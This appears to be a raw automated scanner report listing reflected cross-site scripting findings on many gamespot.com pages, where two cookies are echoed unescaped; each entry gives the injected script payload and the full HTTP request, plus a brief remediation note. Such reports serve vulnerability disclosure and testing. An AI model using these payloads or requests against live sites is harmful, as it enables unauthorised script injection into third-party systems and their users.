The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b4bb"><script>alert(1)</script>c2429b93e85 was submitted in the XCLGFbrowser cookie. This input was echoed as 2b4bb\"><script>alert(1)</script>c2429b93e85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pc/strategy/ageofempiresiii/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw2b4bb"><script>alert(1)</script>c2429b93e85; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 763e5"><script>alert(1)</script>59d0f7962c5 was submitted in the globid cookie. This input was echoed as 763e5\"><script>alert(1)</script>59d0f7962c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pc/strategy/ageofempiresiii/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX763e5"><script>alert(1)</script>59d0f7962c5; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92598"><script>alert(1)</script>93f2fd75247 was submitted in the XCLGFbrowser cookie. This input was echoed as 92598\"><script>alert(1)</script>93f2fd75247 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ps2/action/grandtheftautovicecity/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw92598"><script>alert(1)</script>93f2fd75247; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6272b"><script>alert(1)</script>c8ff544f2ad was submitted in the globid cookie. This input was echoed as 6272b\"><script>alert(1)</script>c8ff544f2ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ps2/action/grandtheftautovicecity/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX6272b"><script>alert(1)</script>c8ff544f2ad; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e81a2"><script>alert(1)</script>f12889f1c99 was submitted in the XCLGFbrowser cookie. This input was echoed as e81a2\"><script>alert(1)</script>f12889f1c99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ps2/action/gta4/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwe81a2"><script>alert(1)</script>f12889f1c99; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc1b1"><script>alert(1)</script>43d3e88e114 was submitted in the globid cookie. This input was echoed as cc1b1\"><script>alert(1)</script>43d3e88e114 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ps2/action/gta4/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHXcc1b1"><script>alert(1)</script>43d3e88e114; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bec2b"><script>alert(1)</script>2ceff930a7d was submitted in the XCLGFbrowser cookie. This input was echoed as bec2b\"><script>alert(1)</script>2ceff930a7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ps2/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwbec2b"><script>alert(1)</script>2ceff930a7d; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ab53"><script>alert(1)</script>ede3b6068b2 was submitted in the globid cookie. This input was echoed as 9ab53\"><script>alert(1)</script>ede3b6068b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ps2/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX9ab53"><script>alert(1)</script>ede3b6068b2; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4723d"><script>alert(1)</script>7adf38aa08f was submitted in the XCLGFbrowser cookie. This input was echoed as 4723d\"><script>alert(1)</script>7adf38aa08f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ps3/action/assassinscreedbrotherhood/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw4723d"><script>alert(1)</script>7adf38aa08f; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34ff8"><script>alert(1)</script>c4e82c888da was submitted in the globid cookie. This input was echoed as 34ff8\"><script>alert(1)</script>c4e82c888da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ps3/action/assassinscreedbrotherhood/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX34ff8"><script>alert(1)</script>c4e82c888da; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2a4d"><script>alert(1)</script>62e4fc4805e was submitted in the XCLGFbrowser cookie. This input was echoed as e2a4d\"><script>alert(1)</script>62e4fc4805e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ps3/action/grandtheftauto4/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwe2a4d"><script>alert(1)</script>62e4fc4805e; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3223a"><script>alert(1)</script>259c7e87e92 was submitted in the globid cookie. This input was echoed as 3223a\"><script>alert(1)</script>259c7e87e92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ps3/action/grandtheftauto4/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX3223a"><script>alert(1)</script>259c7e87e92; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 120ad"><script>alert(1)</script>68f93f8d490 was submitted in the XCLGFbrowser cookie. This input was echoed as 120ad\"><script>alert(1)</script>68f93f8d490 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ps3/action/uncharted3drakesdeception/video/6285796 HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw120ad"><script>alert(1)</script>68f93f8d490; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba798</script><script>alert(1)</script>4366b45d8c5 was submitted in the XCLGFbrowser cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ps3/action/uncharted3drakesdeception/video/6285796 HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwba798</script><script>alert(1)</script>4366b45d8c5; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2d41"><script>alert(1)</script>638b33626b6 was submitted in the globid cookie. This input was echoed as d2d41\"><script>alert(1)</script>638b33626b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ps3/action/uncharted3drakesdeception/video/6285796 HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHXd2d41"><script>alert(1)</script>638b33626b6; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50a6b"><script>alert(1)</script>0ede32856ba was submitted in the XCLGFbrowser cookie. This input was echoed as 50a6b\"><script>alert(1)</script>0ede32856ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ps3/driving/granturismo52/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw50a6b"><script>alert(1)</script>0ede32856ba; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 546b4"><script>alert(1)</script>b83ecff27e6 was submitted in the globid cookie. This input was echoed as 546b4\"><script>alert(1)</script>b83ecff27e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ps3/driving/granturismo52/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX546b4"><script>alert(1)</script>b83ecff27e6; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1460"><script>alert(1)</script>c2a3b16c9df was submitted in the XCLGFbrowser cookie. This input was echoed as e1460\"><script>alert(1)</script>c2a3b16c9df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ps3/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwe1460"><script>alert(1)</script>c2a3b16c9df; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 430ed"><script>alert(1)</script>513b226b3fe was submitted in the globid cookie. This input was echoed as 430ed\"><script>alert(1)</script>513b226b3fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ps3/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX430ed"><script>alert(1)</script>513b226b3fe; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11ee4"><script>alert(1)</script>d05245123b1 was submitted in the XCLGFbrowser cookie. This input was echoed as 11ee4\"><script>alert(1)</script>d05245123b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /psp/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw11ee4"><script>alert(1)</script>d05245123b1; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a17d"><script>alert(1)</script>0dd57701ab2 was submitted in the globid cookie. This input was echoed as 8a17d\"><script>alert(1)</script>0dd57701ab2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /psp/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX8a17d"><script>alert(1)</script>0dd57701ab2; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d98e"><script>alert(1)</script>1dba8602e8e was submitted in the XCLGFbrowser cookie. This input was echoed as 1d98e\"><script>alert(1)</script>1dba8602e8e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /reviews.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw1d98e"><script>alert(1)</script>1dba8602e8e; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fefd"><script>alert(1)</script>8ff54423c6d was submitted in the globid cookie. This input was echoed as 5fefd\"><script>alert(1)</script>8ff54423c6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /reviews.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX5fefd"><script>alert(1)</script>8ff54423c6d; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 684f4"><script>alert(1)</script>cc460fdc769 was submitted in the XCLGFbrowser cookie. This input was echoed as 684f4\"><script>alert(1)</script>cc460fdc769 in the application's response.
